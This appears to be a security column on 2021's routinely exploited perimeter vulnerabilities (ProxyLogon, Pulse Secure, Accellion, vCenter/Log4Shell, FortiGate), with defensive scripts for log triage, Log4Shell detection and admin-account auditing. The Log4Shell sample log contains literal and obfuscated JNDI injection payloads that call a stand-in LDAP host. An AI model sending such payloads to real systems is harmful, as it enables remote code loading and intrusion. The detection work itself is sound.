Initial access vectors are the methods threat actors use to first gain a foothold in an organization's systems: exploitation of vulnerabilities, stolen credentials, phishing, or brute-forcing exposed services such as RDP or SSH. Access obtained this way is frequently sold on by threat actors who specialize in obtaining it, known as Initial Access Brokers.
The focus of this column is vulnerabilities that let a threat actor establish a beachhead in the network. Although the vulnerabilities discussed are drawn from CISA's list of Top Routinely Exploited Vulnerabilities for last year, they still provide insight into the types of devices and applications ransomware threat actors have targeted and will continue to exploit, and into the tactics, techniques, and procedures (TTPs) they use.
At a very high level, a vulnerability is a weakness in a piece of software that could, in theory, be used to make the software do something its developers did not intend. A vulnerability on its own is not useful to a threat actor: it must be exploitable, the threat actor must have a working way to exploit it, and the exploit must produce the effect the threat actor wants.
A vulnerability is exploitable when a threat actor can directly use it to accomplish a specific goal, such as escalating privileges, gaining remote code execution, exposing sensitive data, or leaking system configurations.
According to CISA, vulnerabilities in perimeter devices were popular targets in 2021; in addition to the CVEs it had already identified for 2020, CISA identified known-exploited CVEs in five externally facing products. Together, these sets of vulnerabilities illustrate the variety of devices that ransomware and advanced persistent threat (APT) actors exploit and the capabilities those exploits give them.
According to Microsoft, DearCry ransomware was deployed on compromised on-premises Microsoft Exchange servers in 2021 after exploitation of a chain of four vulnerabilities known as ProxyLogon. One of them, CVE-2021-26855, was described by CISA as allowing an unauthenticated attacker to authenticate as the Exchange server by sending arbitrary HTTP requests.
Once a threat actor has authenticated to the Exchange server, it is possible to gain access to the Active Directory (AD) environment, since Exchange servers typically hold broad permissions in AD. From there, the threat actor can use a tool like BloodHound to enumerate the AD environment and visualize a path to elevated privileges. The remaining three vulnerabilities (CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) were remote code execution vulnerabilities in Exchange that require prior authentication, which CVE-2021-26855 supplies; chained together, they could further a ransomware threat actor's goals.
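The CVE-2021-26855 behaviour described above leaves a trace in Exchange's own HttpProxy logs, and the check a defender would run first is the one Microsoft published after ProxyLogon: a request row with an empty AuthenticatedUser whose AnchorMailbox value starts with `ServerInfo~` and contains a `/`. The following triage script is an added example written for this column, not code from Microsoft or CISA; the log text in `SAMPLE_HTTPPROXY_LOG` is constructed and uses only a subset of the real `#Fields` columns, and the `Hit` type and function names are this example's own.

```python
"""Triage Exchange HttpProxy logs for the CVE-2021-26855 indicator.

Added example, not part of the original column. The rule is the hunting
indicator Microsoft published for ProxyLogon: an HttpProxy log row with an
empty AuthenticatedUser whose AnchorMailbox starts with "ServerInfo~" and
contains a "/" (a backend path reached as the server itself, not as a user).
The log text below is constructed and uses a subset of the real columns.
"""
import csv
from collections import Counter
from dataclasses import dataclass

# Constructed sample in the shape of an Exchange HttpProxy log (subset of #Fields).
SAMPLE_HTTPPROXY_LOG = """\
#Software: Microsoft Exchange Server
#Log-type: HttpProxy Logs
#Fields: DateTime,RequestId,ClientIpAddress,UrlHost,UrlStem,ProtocolAction,UserAgent,AuthenticatedUser,AnchorMailbox,HttpStatus
2021-03-02T10:15:01.123Z,a1,203.0.113.45,mail.example.com,/owa/auth/x.js,GET,Mozilla/5.0,,ServerInfo~mail.example.com/ecp/x.js?a=b,200
2021-03-02T10:15:02.456Z,a2,198.51.100.7,mail.example.com,/owa/,GET,Mozilla/5.0,EXAMPLE\\jdoe,Sid~S-1-5-21-1,200
2021-03-02T10:15:03.789Z,a3,203.0.113.45,mail.example.com,/ecp/y.js,POST,python-requests/2.25,,ServerInfo~mail.example.com/autodiscover/autodiscover.xml?a=b,200
2021-03-02T10:15:04.000Z,a4,192.0.2.10,mail.example.com,/mapi/emsmdb/,POST,Outlook,EXAMPLE\\asmith,Sid~S-1-5-21-2,200
2021-03-02T10:15:05.000Z,a5,192.0.2.11,mail.example.com,/autodiscover/autodiscover.xml,POST,Outlook,,ServerInfo~mail.example.com,401
"""


@dataclass(frozen=True)
class Hit:
    timestamp: str
    client_ip: str
    url_stem: str
    anchor_mailbox: str


def parse_httpproxy_log(text: str) -> list[dict]:
    """Parse the CSV body; '#Fields:' names the columns, other '#' lines are metadata."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if fields is None:
            raise ValueError("data row encountered before the #Fields header")
        values = next(csv.reader([line]))
        rows.append(dict(zip(fields, values)))
    return rows


def is_proxylogon_indicator(row: dict) -> bool:
    """Empty AuthenticatedUser plus an AnchorMailbox matching 'ServerInfo~*/*'."""
    user = row.get("AuthenticatedUser", "").strip()
    anchor = row.get("AnchorMailbox", "")
    return not user and anchor.startswith("ServerInfo~") and "/" in anchor


def find_proxylogon_indicators(text: str) -> list[Hit]:
    """All rows matching the indicator, as Hit records for a triage queue."""
    return [
        Hit(r["DateTime"], r["ClientIpAddress"], r["UrlStem"], r["AnchorMailbox"])
        for r in parse_httpproxy_log(text)
        if is_proxylogon_indicator(r)
    ]


def sources_by_hit_count(text: str) -> dict[str, int]:
    """Client IPs ranked by number of indicator rows, for pivoting into firewall logs."""
    return dict(Counter(h.client_ip for h in find_proxylogon_indicators(text)))


if __name__ == "__main__":
    for hit in find_proxylogon_indicators(SAMPLE_HTTPPROXY_LOG):
        print(f"{hit.timestamp} {hit.client_ip} {hit.url_stem} -> {hit.anchor_mailbox}")
    print(sources_by_hit_count(SAMPLE_HTTPPROXY_LOG))
```

The last sample row shows why the `/` matters: an unauthenticated request with a bare `ServerInfo~` anchor is not the indicator. Hits are leads, not confirmation; the next step is to pull the matching ECP and OAB generator logs and check for files dropped under the Exchange web roots.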
Pulse Connect Secure provides VPN access for remote workers and third-party clients. In 2021, CISA observed an unattributed threat actor using several vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and CVE-2021-22893, to gain initial access to Pulse Connect Secure systems at multiple organizations and place webshells on them.
Ransomware threat actors, including REvil, Netwalker, and others, have used these vulnerabilities; while some serve only for initial access, others enable lateral movement or the dropping of additional payloads, including ransomware. Webshells, such as those placed by the threat actor CISA highlighted, give a threat actor persistent access to the compromised system and therefore to the organization behind it.
In early 2021, the compromise of the Accellion File Transfer Appliance (FTA) file-sharing service provided initial access to many organizations, allowing threat actors to drop the DEWMODE webshell. Four zero-day vulnerabilities were used in the Accellion FTA breach: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, and CVE-2021-27104, of which the SQL injection, CVE-2021-27101, was used for initial access.
Because the same product is deployed at many customers, breaching this one appliance gave threat actors access to a wide variety of organizations that use it. Like other supply chain attacks, the incident demonstrates the wide-reaching effect of compromising a single tool.
CISA identified a VMware vCenter Server remote code execution vulnerability (CVE-2021-21985) that threat actors associated with Conti used, along with the Log4Shell vulnerability in Log4j (CVE-2021-44228), to gain access to VMware servers. While initial access to the organization itself was gained through RDP, VPN, or phishing, access to vCenter lets the threat actor have a far more substantial impact, since many organizations run key parts of their operational infrastructure as virtual machines managed by vCenter.
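Log4Shell probes rarely arrive as a plain `${jndi:...}` string; attackers hide the trigger behind nested lookups that Log4j resolves before the JNDI lookup runs (`${lower:J}`, `${upper:n}`, and the default-value form `${anything:-d}`, including `${::-d}`), and sometimes URL-encode the whole thing. A detection that matches only the literal string misses most of what was seen in the wild. The normalizer below is an added example written for this column, not code from VMware, Apache or CISA; it replays those three substitutions so a plain pattern match sees the payload the way Log4j would. The lines in `SAMPLE_REQUEST_LOG` are constructed in combined log format with documentation IP addresses and do not reproduce vCenter's real log layout.

```python
"""Normalize Log4j lookup obfuscation and flag Log4Shell (CVE-2021-44228) probes.

Added example, not from the original column or from VMware. It resolves the
three lookup forms commonly used to disguise "${jndi:": ${lower:x},
${upper:x} and the default-value form ${key:-default} (also ${::-x}), then
matches the normalized text. Sample lines are constructed.
"""
import re
from urllib.parse import unquote

# Innermost ${...} with no nested braces; resolved repeatedly from the inside out.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Log4j lookup names are matched case-insensitively, so "${JnDi:" counts too.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Constructed request log lines (combined log format, RFC 5737 addresses).
SAMPLE_REQUEST_LOG = [
    '203.0.113.9 - - [10/Dec/2021:13:01:02 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:01:05 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${::-d}${upper:i}:${::-l}dap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:01:09 +0000] "GET /ui/login?x=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.20 - - [10/Dec/2021:13:02:00 +0000] "GET /ui/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Dec/2021:13:02:30 +0000] "GET /ui/?q=${upper:x} HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]


def _resolve(body: str) -> str:
    """Resolve one innermost lookup body; unknown lookups are left in place."""
    if ":-" in body:
        # ${key:-default} evaluates to the default when key is unset,
        # which is what attackers rely on with ${::-d} and ${env:NOPE:-d}.
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep:
        if name.lower() == "lower":
            return arg.lower()
        if name.lower() == "upper":
            return arg.upper()
    return "${" + body + "}"


def normalize_lookups(s: str, max_rounds: int = 32) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = _LOOKUP.sub(lambda m: _resolve(m.group(1)), s)
        if resolved == s:
            break
        s = resolved
    return s


def is_log4shell_probe(raw: str) -> bool:
    """True when a ${jndi: lookup remains after URL-decoding and normalization."""
    return bool(_JNDI.search(normalize_lookups(unquote(raw))))


def scan(lines: list[str]) -> list[int]:
    """Indices of log lines that carry a Log4Shell probe."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_REQUEST_LOG):
        print(i, normalize_lookups(unquote(SAMPLE_REQUEST_LOG[i])))
```

Run this over any field an attacker controls and the application logs (User-Agent, X-Forwarded-For, query strings, usernames), not just the request line. The normalizer is deliberately narrow: it resolves only the lookups that exist without a configured value on a default install, so it never invents environment or system-property values that a real target might or might not have.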
In May 2021, an FBI Flash report warned defenders that APT threat actors were targeting vulnerabilities in Fortinet's FortiGate firewall appliances, specifically CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591. In that case, after gaining initial access, the threat actor created an additional user account so that it could continue its malicious activity on the network.
Fortinet released FortiOS patches that mitigate these vulnerabilities, but compared with traditional Windows systems, network appliances often receive less emphasis on regular patching, and fewer system administration utilities and defensive tools are available for them.
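With fewer tooling options on the appliance itself, the practical control for the account-creation behaviour described above is to diff the device's exported configuration against a known-good baseline on a schedule. The script below is an added example written for this column, not code from Fortinet or the FBI: it parses the `config system admin` section of a FortiOS configuration export and reports accounts that are not in the baseline, `super_admin` accounts with no `trusthost` restriction, and baseline accounts that have disappeared. `SAMPLE_CONFIG` is constructed; the account names (`ops-readonly`, `svc-backup`) and addresses are placeholders, and `parse_fortios_section` and `audit_admins` are this example's own helpers.

```python
"""Audit FortiOS admin accounts in a config export against a known-good baseline.

Added example, not from the original column or from Fortinet. Parses the
`config system admin` block of a FortiOS configuration export and reports
unexpected accounts (the kind of added user the FBI Flash describes),
super_admin accounts without a trusthost restriction, and baseline accounts
that are missing. The configuration below is constructed with placeholder names.
"""
import re

SAMPLE_CONFIG = """\
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set trusthost1 10.0.0.0 255.255.255.0
        set password ENC placeholder
    next
    edit "ops-readonly"
        set accprofile "prof_admin"
        set vdom "root"
        set password ENC placeholder
    next
    edit "svc-backup"
        set accprofile "super_admin"
        set vdom "root"
        config gui-dashboard
            edit 1
                set name "Status"
            next
        end
        set password ENC placeholder
    next
end
config system interface
    edit "port1"
        set ip 203.0.113.2 255.255.255.0
        set allowaccess ping https ssh
    next
end
"""

_EDIT = re.compile(r'^edit\s+"?([^"]+)"?$')
_SET = re.compile(r'^set\s+(\S+)\s+(.*)$')


def parse_fortios_section(config_text: str, section: str) -> dict[str, dict[str, str]]:
    """Return {entry_name: {setting: value}} for one top-level `config <section>` block.

    Nested `config ... end` blocks inside an entry (such as gui-dashboard) are
    skipped so their own `edit`/`set` lines do not pollute the entry's settings.
    """
    entries: dict[str, dict[str, str]] = {}
    in_section = False
    depth = 0
    current = None
    for raw in config_text.splitlines():
        line = raw.strip()
        if not in_section:
            in_section = line == f"config {section}"
            continue
        if line.startswith("config "):
            depth += 1
            continue
        if line == "end":
            if depth == 0:
                break
            depth -= 1
            continue
        if depth:
            continue
        m = _EDIT.match(line)
        if m:
            current = m.group(1)
            entries[current] = {}
            continue
        if line == "next":
            current = None
            continue
        m = _SET.match(line)
        if m and current is not None:
            entries[current][m.group(1)] = m.group(2).strip().strip('"')
    return entries


def audit_admins(config_text: str, baseline: set[str]) -> list[str]:
    """Findings worth a ticket: unexpected accounts, unrestricted super_admins, missing baseline accounts."""
    admins = parse_fortios_section(config_text, "system admin")
    findings = []
    for name, settings in admins.items():
        profile = settings.get("accprofile", "?")
        if name not in baseline:
            findings.append(f"unexpected admin account '{name}' (profile {profile})")
        if profile == "super_admin" and not any(k.startswith("trusthost") for k in settings):
            findings.append(f"super_admin '{name}' has no trusthost restriction")
    for name in sorted(set(baseline) - set(admins)):
        findings.append(f"baseline admin '{name}' missing from device")
    return findings


if __name__ == "__main__":
    for finding in audit_admins(SAMPLE_CONFIG, {"admin", "ops-readonly"}):
        print(finding)
```

A configuration export only shows the state at export time, so pair this with the device's event log for admin-object changes; an account that is created, used and deleted between two exports will not appear in the diff.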
These five perimeter products targeted in 2021 give a glimpse of the ways vulnerability exploitation can affect organizations. The vulnerabilities highlighted here allowed threat actors to deploy ransomware, conduct supply chain attacks, place webshells for persistent access, and compromise the systems that host organizations' virtualized infrastructure. So while exploiting vulnerabilities in externally facing applications and devices primarily affords initial access, that access can lead to a wide variety of malicious behavior.
Many of the vulnerabilities featured here were recent, and several were zero-days when first exploited; the other vulnerabilities CISA recommended patching in its advisory included several much older ones.
As long as systems remain unpatched and these vulnerabilities remain effective, it is very likely threat actors will continue to use them. This highlights the need to patch externally facing systems, such as those described above, wherever possible, and to monitor them rigorously.